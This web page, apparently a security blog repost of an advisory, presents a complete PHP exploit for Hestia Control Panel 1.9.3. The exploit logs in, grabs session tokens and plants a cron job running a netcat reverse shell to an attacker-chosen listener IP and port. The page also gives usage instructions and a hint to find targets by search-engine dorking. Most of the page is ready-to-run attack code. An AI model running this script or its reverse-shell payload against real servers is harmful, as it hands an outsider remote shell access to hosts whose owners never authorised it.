Latest Tech

Latest Posts

Hestia Control Panel 1.9.3 Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 152
Hestia Control Panel 1.9.3 Code Execution
Hestia Control Panel 1.9.3 Code Execution
Hestia Control Panel 1.9.3 Code Execution

=============================================================================================================================================
| # Title Hestia Control Panel 1.9.3 Code Execution

=============================================================================================================================================
| # Title : Hestia Control Panel 1.9.3 PHP code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://hestiacp.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: This code is a PHP exploit that targets the cronjobs system on a specific server, by executing commands remotely after logging in.

(Related : https://packetstorm.news/files/id/189606/ Related CVE numbers: ) .

[+] save code as poc.php.

[+] Usage: php script.php <url> <username> <password> <listener_ip> <listener_port>

[+] PayLoad :


<?php

function login($url, $username, $password) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url/login/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$token_response = curl_exec($ch);
curl_close($ch);

if (!preg_match('/<input type="hidden" name="token" value="(.*?)">/', $token_response, $matches)) {
echo "Failed to retrieve login token\n";
return [null, null];
}

$token = $matches[1];
$postData = http_build_query([
'token' => $token,
'user' => $username
]);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url/login/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$username_response = curl_exec($ch);
curl_close($ch);

if (!preg_match('/<input type="hidden" name="token" value="(.*?)">/', $username_response, $matches)) {
echo "Failed to retrieve password token\n";
return [null, null];
}

$token = $matches[1];
$postData = http_build_query([
'token' => $token,
'password' => $password
]);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url/login/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
$password_response = curl_exec($ch);
curl_close($ch);

if (strpos($password_response, 'login') !== false) {
echo "Login failed!\n";
return [null, null];
}

echo "Login successful!\n";
return ['cookies.txt', $token];
}

function create_cron($url, $cookieFile, $listener_ip, $listener_port, $token) {
$cron_payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $listener_ip $listener_port >/tmp/f";

$postData = http_build_query([
'token' => $token,
'ok' => 'Add',
'v_cmd' => $cron_payload,
'v_min' => '*',
'v_hour' => '*',
'v_day' => '*',
'v_month' => '*',
'v_wday' => '*'
]);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url/add/cron/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieFile);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$cron_response = curl_exec($ch);
curl_close($ch);

if (strpos($cron_response, 'cron') !== false) {
echo "Cronjob successfully generated!\n";
return true;
}

echo "Failed to create cronjob.\n";
return false;
}

if ($argc < 6) {
echo "Usage: php script.php <url> <username> <password> <listener_ip> <listener_port>\n";
exit(1);
}

$url = $argv[1] ?? '';
$username = $argv[2] ?? '';
$password = $argv[3] ?? '';
$listener_ip = $argv[4] ?? '';
$listener_port = $argv[5] ?? '';

list($cookieFile, $token) = login($url, $username, $password);
if ($cookieFile) {
if (create_cron($url, $cookieFile, $listener_ip, $listener_port, $token)) {
echo "Cronjob created, waiting for connection...\n";
}
}






Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.